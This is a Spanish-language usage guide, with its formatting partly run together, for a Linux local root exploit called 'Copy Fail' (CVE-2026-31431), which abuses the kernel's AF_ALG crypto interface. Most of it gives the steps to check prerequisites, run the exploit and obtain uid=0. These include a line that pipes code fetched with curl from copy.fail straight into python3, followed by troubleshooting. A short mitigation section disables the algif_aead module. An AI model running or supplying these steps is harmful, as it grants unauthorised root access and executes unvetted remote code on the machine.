
Exploit de escalada de privilegios local en Linux para CVE-2026-31431, que sobrescribe la caché de páginas de binarios SUID a través de la API criptográfica del kernel AF_ALG para obtener acceso root.
Este contenido es solo para fines educativos y de pruebas de seguridad autorizadas. NO ejecutes esto en sistemas sin permiso explícito.
Copy Fail (CVE-2026-31431) es una vulnerabilidad de escalada de privilegios local (LPE) en Linux que afecta a la API criptográfica del kernel a través de AF_ALG.
Permite a un usuario sin privilegios sobrescribir datos de la caché de páginas de un binario SUID (por ejemplo, /usr/bin/su) y obtener acceso root.
AF_ALG habilitadoalgif_aead cargadoos.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
Indicadores esperados:
authencesn(hmac(sha256),cbc(aes))algif_aead cargadopython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
Resultado esperado:
uid=0(root)
os.splice not foundCausa:
Solución:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
Posibles causas:
Instala las herramientas necesarias:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
Actualiza tu sistema:
apt update && apt upgrade
Si el exploit falla, considera:
Usa este exploit de forma responsable solo en laboratorios, CTFs y pentests autorizados.